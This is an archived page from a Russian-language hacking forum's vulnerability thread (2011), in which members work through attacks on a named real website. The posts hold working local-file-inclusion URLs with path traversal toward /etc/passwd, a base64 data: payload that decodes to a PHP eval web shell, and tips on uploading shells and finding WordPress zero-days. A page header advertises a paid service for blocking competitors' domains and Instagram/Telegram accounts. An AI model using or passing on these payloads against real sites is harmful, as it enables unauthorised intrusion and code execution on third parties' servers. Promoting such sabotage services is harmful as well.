УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1719 из 2438

1719

Опции темы

Поиск в этой теме

Опции просмотра

#17181

05.06.2011, 20:37

Kuteke

Guest

Сообщений: n/a

Провел на форуме:
60692

Репутация: 6

Цитата:

Сообщение от Tigger

Tigger said:
Я, так понимаю, он просит зиродэй плоенты под вп 3.1.1, а не сам процесс заливки шелла ))

Да, да!

#17182

05.06.2011, 20:47

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Отправить сообщение для Konqi с помощью ICQ

Цитата:

Сообщение от Kuteke

Kuteke said:
Да, да!

в паблике ничего серезного нету, разве что тока пассивка xss

баги надо искать в сторонных компонентах

#17183

05.06.2011, 21:36

Oro4imaru

Guest

Сообщений: n/a

Провел на форуме:
4616

Репутация: 0

как залить шелл через шаблон. на дле 8.5? и можно ли это сделать? в сет есть несколько вариантов как это сделать но пока ни один не помог

#17184

05.06.2011, 23:54

FlaktW

Участник форума

Регистрация: 19.08.2009

Сообщений: 115

Провел на форуме:
111014

Репутация: 8

Это инклюд?

Цитата:

Сообщение от None

http://www.guitars.ru/01/info.php?z828'

#17185

06.06.2011, 00:10

Tigger

Познавший АНТИЧАТ

Регистрация: 27.08.2007

Сообщений: 1,107

Провел на форуме:
5386281

Репутация: 1177

Отправить сообщение для Tigger с помощью ICQ

Цитата:

Сообщение от FlaktW

FlaktW said:
Это инклюд?

Ну так даже в ошибке же написано о_0

http://www.guitars.ru/01/info.php?z828'z../../../../../../../../../../../var/www/mstia/data/www/guitars.ru/01/info.php

Увы, но allow_url_include там off...

http://www.guitars.ru/01/info.php?data:;base64,PD9waHAgZXZhbCgkX0dFVFtjbWRd KTsgPz4=

Вот, советую к прочтению: http://www.xakep.ru/post/49508/default.asp

#17186

06.06.2011, 00:18

FlaktW

Участник форума

Регистрация: 19.08.2009

Сообщений: 115

Провел на форуме:
111014

Репутация: 8

Цитата:

Сообщение от Tigger

Tigger said:
Ну так даже в ошибке же написано о_0
http://www.guitars.ru/01/info.php?z828'z../../../../../../../../../../../var/www/mstia/data/www/guitars.ru/01/info.php

Почему /etc/passwd не выводится?

http://www.guitars.ru/01/info.php?z828'z../../../../../../../../../../../etc/passwd%00

#17187

06.06.2011, 00:22

Tigger

Познавший АНТИЧАТ

Регистрация: 27.08.2007

Сообщений: 1,107

Провел на форуме:
5386281

Репутация: 1177

Цитата:

Сообщение от FlaktW

FlaktW said:
Почему /etc/passwd не выводится?
http://www.guitars.ru/01/info.php?z828'z../../../../../../../../../../../etc/passwd%00

Null-байт там не нужен, ничего же не добавляеться.

/etc/passwd - не читает потому что там написано, что не разрешено выполнять инклюд данного файла "Operation not permitted".

#17188

06.06.2011, 00:48

Lasteeck

Познающий

Регистрация: 05.04.2010

Сообщений: 30

Провел на форуме:
151946

Репутация: 2

Цитата:

Сообщение от Tigger

Tigger said:
Null-байт там не нужен, ничего же не добавляеться.
/etc/passwd - не читает потому что там написано, что не разрешено выполнять инклюд данного файла "Operation not permitted".

Цитата:

Сообщение от None

../../../../../../../../../../../

почему именно столько диров + к ним еще документ рут?

ваще не могу понять как вычислить длину этих диров ../../

#17189

06.06.2011, 00:59

White Bear

Guest

Сообщений: n/a

Провел на форуме:
1941

Репутация: 0

Цитата:

Сообщение от Lasteeck

Lasteeck said:
почему именно столько диров + к ним еще документ рут?
ваще не могу понять как вычислить длину этих диров ../../

../ эта штука на сколько каталогов надо подняться наверх

например есть сайт

site.ru/article.php?list=1

и такой путь до article

/usr/www/site.com/article

надо подняться на 4 каталога вверх

Вообще почитай об иерархии файлов в nix системах

#17190

06.06.2011, 01:16

mailbrush

Познавший АНТИЧАТ

Регистрация: 24.06.2008

Сообщений: 1,996

Провел на форуме:
6075534

Репутация: 2731

Отправить сообщение для mailbrush с помощью ICQ

Цитата:

Сообщение от Tigger

Tigger said:
Увы, но allow_url_include там off...

Зато там есть форум. Где твоя смекалка?

Страница 1719 из 2438

1719

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)

Быстрый переход